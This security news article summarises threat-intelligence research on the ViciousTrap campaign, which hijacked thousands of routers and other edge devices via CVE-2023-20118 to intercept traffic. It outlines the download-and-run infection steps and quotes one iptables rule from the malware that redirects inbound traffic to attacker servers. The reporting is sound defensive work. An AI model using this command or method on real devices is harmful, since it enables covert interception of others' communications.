ViciousTrap Hacker Compromised 5,500+ Edge Devices From 50+ Brands & Turned Them Into Honeypots

A sophisticated threat actor designated as ViciousTrap has successfully compromised over 5,500 edge devices across more than 50 brands, transforming them into a massive distributed honeypot network capable of intercepting and monitoring exploitation attempts worldwide.

This unprecedented campaign represents a significant evolution in cyberthreat tactics, where attackers leverage compromised infrastructure not merely for traditional malicious purposes, but to create surveillance systems that can capture zero-day exploits and monitor other threat actors’ activities.

The campaign primarily targets end-of-life devices including SOHO routers, SSL VPNs, DVRs, and BMC controllers from major manufacturers such as Cisco, D-Link, Linksys, ASUS, QNAP, and Araknis Networks.

The threat actor exploits known vulnerabilities, particularly CVE-2023-20118 affecting Cisco SOHO routers, to gain initial access and deploy their malicious infrastructure.

Sekoia researchers identified this campaign through their honeypot observations, noting sustained daily exploitation attempts originating from a single IP address since March 2025.

The geographic distribution of compromised devices spans 84 countries, with Macao showing the highest concentration of infected systems, likely due to widespread use of vulnerable D-Link DIR-850L routers in that region.

Devices and brands monitored (Source – Sekoia)

The attackers operate from Malaysian infrastructure under Autonomous System AS45839, utilizing servers provided by Shinjiru hosting company.

Analysis reveals the threat actor’s likely Chinese-speaking origin, evidenced by weak overlaps with GobRAT infrastructure and strategic targeting patterns that avoid compromising devices within China while focusing on assets in Taiwan and the United States.

This honeypot network enables ViciousTrap to position themselves as silent observers in the cyberthreat ecosystem, potentially collecting non-public or zero-day exploits deployed by other threat actors.

The sophisticated nature of this operation suggests intelligence gathering objectives rather than traditional cybercriminal motivations, representing a concerning trend where compromised devices serve dual purposes as both attack infrastructure and surveillance platforms.

Infection Mechanism and NetGhost Deployment

The infection chain employed by ViciousTrap demonstrates remarkable technical sophistication through a multi-stage process designed to minimize detection while maximizing persistence.

Initial access begins with exploitation of the CVE-2023-20118 vulnerability, in which the attackers execute commands through the vulnerable config.exp endpoint to download and run a bash script.

The attack unfolds through a carefully orchestrated sequence: first, the attacker uses ftpget to retrieve a script named ‘a’ from their staging server at 101.99.90.20, which subsequently downloads a customized busybox wget binary compiled for MIPS architecture and stores it in the compromised device’s /tmp directory.

This binary serves as a critical component for subsequent communication with command and control infrastructure.

ViciousTrap redirection infrastructure (Source – Sekoia)

Following initial payload deployment, the vulnerability is exploited a second time to retrieve and execute the main payload using a unique UUID identifier for each infection attempt.

This UUID-based system allows the attackers to implement an allow-list mechanism, ensuring payloads are delivered only to confirmed compromised systems.

The secondary script, internally designated as NetGhost, implements the core functionality of the operation.

NetGhost performs several critical functions upon execution. The script immediately removes itself using an rm command to minimize forensic artifacts, then conducts port availability checks on ports 80, 8000, and 8080 to identify suitable redirection targets.

Once an available port is identified, the script configures iptables NAT rules to redirect all inbound traffic to attacker-controlled interception servers, specifically 111.90.148.151 and 111.90.148.112.

/sbin/iptables -t nat -I PREROUTING -p tcp -m tcp --dport $Dport -j DNAT --to-destination $arg4:$arg5

The final phase involves registration with the command and control infrastructure through five HTTP requests containing the redirected port number and victim identifier, effectively notifying attackers of successful compromise and enabling them to begin monitoring intercepted traffic.

This mechanism transforms each compromised device into a transparent proxy, allowing ViciousTrap to observe and potentially manipulate communications flowing through these systems while maintaining the appearance of normal device operation.
